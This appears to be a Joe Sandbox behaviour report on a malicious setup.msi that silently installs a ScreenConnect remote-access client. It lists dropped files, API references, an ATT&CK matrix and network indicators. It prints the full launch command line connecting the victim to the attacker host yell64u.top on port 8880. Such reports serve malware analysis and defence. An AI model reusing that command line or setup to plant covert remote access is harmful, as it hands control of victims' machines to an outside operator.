                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Memory allocated: 1530000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Memory allocated: 1770000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Memory allocated: 1590000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: B40000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: 1A4D0000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: 13E0000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: 1ADE0000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.dll
                        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
                        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dll
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI160A.tmp
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.Cab.dll
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dll
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI17FF.tmp
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dll
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                        Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 2496 | Thread sleep count: 52 > 30
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 6412 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Last function: Thread delayed (reported twice)
                        Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation (reported 7 times)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Thread delayed: delay time: 922337203685477
                        Source: 5c1177.msi.1.dr | Binary or memory string: VMCi-
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2904291962.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
                        Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs | Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                        Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=dxbleave&c=&c=&c=&c=&c=&c=&c="
                        Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr | Binary or memory string: Progman
                        Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr | Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (reported twice)
                        Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation (reported twice)
                        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformation (reported twice)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformation (reported twice)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformation (reported twice)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformation (reported twice)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformation (reported twice)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation (reported twice)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformation (reported twice)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B403642 CreateNamedPipeW, 7_2_00007FFD9B403642
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_01534D30 RtlGetVersion, 6_2_01534D30
                        Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Windows\System32\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                        Source: Yara match | File source: 7.2.ScreenConnect.WindowsClient.exe.254fa20.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.0.ScreenConnect.WindowsClient.exe.280000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.ScreenConnect.WindowsClient.exe.2e5fa60.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4820, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4888, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3868, type: MEMORYSTR
                        Source: Yara match | File source: C:\Config.Msi\5c1176.rbs, type: DROPPED
                        Source: Yara match | File source: C:\Windows\Installer\MSI15E9.tmp, type: DROPPED
                        Source: Yara match | File source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                        MITRE ATT&CK Matrix (a number in parentheses is the count of matched signatures for that technique; cells without a number are unmatched matrix entries)

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (1) | Windows Management Instrumentation (31) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping | Peripheral Device Discovery (11) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Replication Through Removable Media (1) | Native API (1) | Component Object Model Hijacking (1) | Component Object Model Hijacking (1) | Obfuscated Files or Information (1) | LSASS Memory | System Information Discovery (45) | Remote Desktop Protocol | Data from Removable Media | Non-Standard Port (1) | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (1) | Valid Accounts (1) | Valid Accounts (1) | Timestomp (1) | Security Account Manager | Security Software Discovery (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Scheduled Task/Job (1) | Windows Service (2) | Access Token Manipulation (1) | DLL Side-Loading (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Application Layer Protocol (1) | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Scheduled Task/Job (1) | Windows Service (2) | File Deletion (1) | LSA Secrets | Virtualization/Sandbox Evasion (51) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | Bootkit (1) | Process Injection (3) | Masquerading (122) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Scheduled Task/Job (1) | Valid Accounts (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Virtualization/Sandbox Evasion (51) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (3) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                        Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Hidden Users (1) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                        Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Bootkit (1) | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                        Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | Rundll32 (1) | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
                        Behavior Graph (ID 1555428, sample setup.msi, start date 13/11/2024, architecture WINDOWS, score 80). The rendered graph is not recoverable here; the node data that survives extraction:

                        • Network: yell64u.top resolved to 85.239.34.190, ports 49730 and 8880 (RAINBOW-HK Rainbownetworklimited HK, Russian Federation), contacted by ScreenConnect.ClientService.exe
                        • Processes: msiexec.exe (started three further msiexec.exe instances, one of which started rundll32.exe); ScreenConnect.ClientService.exe (started two ScreenConnect.WindowsClient.exe instances); a second msiexec.exe that dropped C:\Users\user\AppData\Local\Temp\MSID3F.tmp (PE32)
                        • Files dropped by msiexec.exe: ScreenConnect.Wind...dentialProvider.dll (PE32+), C:\...\ScreenConnect.WindowsClient.exe (PE32), C:\...\ScreenConnect.ClientService.exe (PE32), 10 other files (1 malicious)
                        • Files dropped by rundll32.exe: C:\Users\user\...\ScreenConnect.Windows.dll (PE32), C:\...\ScreenConnect.InstallerActions.dll (PE32), C:\Users\user\...\ScreenConnect.Core.dll (PE32), 4 other files (none is malicious)
                        • Signatures shown on the graph: .NET source code references suspicious native API functions; Contains functionality to hide user accounts (sample, ScreenConnect.WindowsClient.exe and rundll32.exe); Possible COM Object hijacking; 2 other signatures; Enables network access during safeboot for specific services (msiexec.exe); Modifies security policies related information (msiexec.exe); Reads the Security eventlog and Reads the System eventlog (ScreenConnect.ClientService.exe); Creates files in the system32 config directory (ScreenConnect.WindowsClient.exe)

                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs
                        C:\Windows\Installer\MSI160A.tmp | 0% | ReversingLabs
                        C:\Windows\Installer\MSI17FF.tmp | 0% | ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        yell64u.top | 85.239.34.190 | true | true | | unknown
                          Name | Source | Malicious | Antivirus Detection | Reputation
                          http://wixtoolset.org/releases/ | rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr | false | | high
                          http://wixtoolset.org/news/ | rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr | false | | high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ScreenConnect.ClientService.exe, 00000006.00000002.2905919832.0000000001952000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                          http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v | rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr | false | | high
                          https://feedback.screenconnect.com/Feedback.axd | ScreenConnect.Core.dll.3.dr | false | | high
                          https://docs.rs/getrandom#nodejs-es-module-support | ScreenConnect.WindowsCredentialProvider.dll.1.dr | false | | high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                       IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                       85.239.34.190 | yell64u.top | Russian Federation | | 134121 | RAINBOW-HKRainbownetworklimitedHK | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1555428
                                      Start date and time:2024-11-13 21:31:16 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 21s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                       Number of new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:setup.msi
                                      Detection:MAL
                                      Classification:mal80.evad.winMSI@15/54@1/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 62%
                                      • Number of executed functions: 110
                                      • Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Found application associated with file extension: .msi
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target rundll32.exe, PID 4820 because it is empty
                                       • Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: setup.msi
                                      No simulations
                                       Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                       85.239.34.190 | statments.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | sstatment.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                       yell64u.top | statments.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       • 85.239.34.190
                                       | sstatment.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       • 85.239.34.190
                                       Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                       RAINBOW-HKRainbownetworklimitedHK | uspr2uHV0H.ps1 | Get hash | malicious | Unknown | Browse
                                       • 85.239.61.60
                                       | test.elf | Get hash | malicious | Unknown | Browse
                                       • 85.239.34.134
                                       | la.bot.m68k.elf | Get hash | malicious | Unknown | Browse
                                       • 24.233.26.195
                                       | bin.i586.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                       • 85.239.34.134
                                       | bin.i686.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                       • 85.239.34.134
                                       | bin.armv7l.elf | Get hash | malicious | Mirai | Browse
                                       • 85.239.34.134
